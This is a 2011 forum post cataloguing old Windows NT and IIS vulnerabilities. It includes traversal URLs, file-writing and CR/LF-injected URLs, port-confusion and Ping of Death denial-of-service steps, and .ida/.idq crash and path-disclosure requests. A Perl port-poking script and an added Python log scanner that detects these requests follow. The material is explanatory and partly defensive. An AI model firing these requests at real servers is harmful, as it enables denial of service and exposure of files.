Title: NT vulnerabilities and their descriptions (English)
Author: 雜七雜八   Posted: 2011-1-13 17:12

Affected systems: NT 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------
Affected systems: NT 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.
If the file 'target.bat' already exists, it will be truncated.
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.
----------------------------------------------------------------------
Affected systems: NT 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.
The following steps:
Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual processor time. To clear this the system must be rebooted.
The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
The following is a modified Perl script gleaned from postings on the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):
/*begin poke code*/
#!/usr/bin/perl
# poke: connect to every TCP port on a host, send a line of about forty
# characters, and disconnect, to find services that 'confuse' as above.
# The posted version relied on the old chat2.pl library; this uses
# IO::Socket::INET, which ships with Perl, and does the same thing.
use strict;
use warnings;
use IO::Socket::INET;

my $systemname = shift @ARGV or die "usage: perl poke servername\n";
my $verbose    = 1;   # tell me what you're hitting
my $knownports = 1;   # don't hit known problem ports (53, 135, 1031)

for (my $port = 1; $port <= 65535; $port++) {
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    print "Trying port: $port\n" if $verbose;
    my $fh = IO::Socket::INET->new(
        PeerAddr => $systemname,
        PeerPort => $port,
        Proto    => 'tcp',
        Timeout  => 2,
    ) or next;   # closed or filtered port: move on to the next one
    print $fh "This is about ten characters or more\r\n";
    close($fh);
}
/*end poke code*/
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: NT 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr>, will crash IIS.
This attack causes Dr. Watson to display an alert window and to log an error:
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
--------------------------------------------------------------------------------
Affected systems: NT 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:
STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
-OR-
STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
NT 4.0 is vulnerable when sending large packets, but does not crash on receiving them.
--------------------------------------------------------------------------------
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0).
When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows them to gain further knowledge of how the web site is organized and the directory structure of the server.
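As an added detection example (not part of the original post), the Python below scans web-server log lines for the request shapes described in the traversal, redirection, .ida DoS and .idq/.ida path-disclosure sections above. It goes a little beyond the page by percent-decoding each URI first, so encoded variants such as %2e%2e%5c are caught as well. The log lines, client addresses, paths and the 4 kB length threshold are constructed for this example and are not taken from the page.

```python
import re
from urllib.parse import unquote

# Hypothetical length threshold: the .ida DoS above used roughly 25 kB of '.',
# so anything over 4 kB is well outside normal request sizes.
LONG_URL = 4096

# Constructed sample log lines (W3C-style: date time client method uri status).
# Hosts, paths and timestamps are made up for this example.
SAMPLE_LOG = "\n".join([
    "1997-06-01 10:00:01 10.0.0.5 GET /default.htm 200",
    r"1997-06-01 10:00:02 10.0.0.9 GET /..\..\winnt\win.ini 200",
    r"1997-06-01 10:00:03 10.0.0.9 GET /scripts..\..\scriptname 200",
    r"1997-06-01 10:00:04 10.0.0.9 GET /scripts/exploit.bat>c:\target.bat 200",
    r"1997-06-01 10:00:05 10.0.0.9 GET /scripts/script_name%0A%0D>c:\target.bat 200",
    "1997-06-01 10:00:06 10.0.0.9 GET /anything.idq 404",
    "1997-06-01 10:00:07 10.0.0.9 GET /" + "." * 25000 + "ida 500",
    "1997-06-01 10:00:08 10.0.0.12 GET /images/logo.gif 200",
])


def parse_line(line):
    """Split one log line into a dict; return None for lines that do not fit."""
    parts = line.split()
    if len(parts) < 6:
        return None
    _date, _time, client, method, uri, status = parts[:6]
    return {"client": client, "method": method, "uri": uri, "status": status}


def classify_uri(uri, long_url=LONG_URL):
    """Return the names of the request shapes a URI matches (empty list if clean).

    Percent-encoding is decoded first, so '%2e%2e%5c' is caught as '..\\' and
    '%0A%0D' as an embedded CR/LF.
    """
    decoded = unquote(uri)
    hits = []
    if "..\\" in decoded:                         # ..\ escapes the content root
        hits.append("backslash-traversal")
    if re.search(r"(^|/)\.\./", decoded):         # ../ (the 'GET ../..' case)
        hits.append("slash-traversal")
    if ">" in decoded:                            # shell redirection inside a URL
        hits.append("shell-redirect")
    if "\r" in decoded or "\n" in decoded:        # %0A%0D smuggled into the request
        hits.append("crlf-in-url")
    if re.search(r"\.id[aq]$", decoded, re.I):    # .ida/.idq path-disclosure probe
        hits.append("idq-ida-probe")
    if len(uri) > long_url:                       # the 25 kB '...ida' DoS
        hits.append("oversized-url")
    return hits


def scan(log_text, long_url=LONG_URL):
    """Return (client, truncated uri, hits) for every flagged line in log_text."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        hits = classify_uri(rec["uri"], long_url)
        if hits:
            findings.append((rec["client"], rec["uri"][:60], hits))
    return findings


if __name__ == "__main__":
    for client, uri, hits in scan(SAMPLE_LOG):
        print(f"{client:12} {', '.join(hits):40} {uri}")
```

Run against the sample log the scanner flags the six probe lines from 10.0.0.9 and leaves the two ordinary requests alone. Decoding before matching matters: a filter that only looks for a literal `..\` in the raw URI misses the `%2e%2e%5c` spelling, while the length check is done on the raw URI because that is what the server actually had to parse.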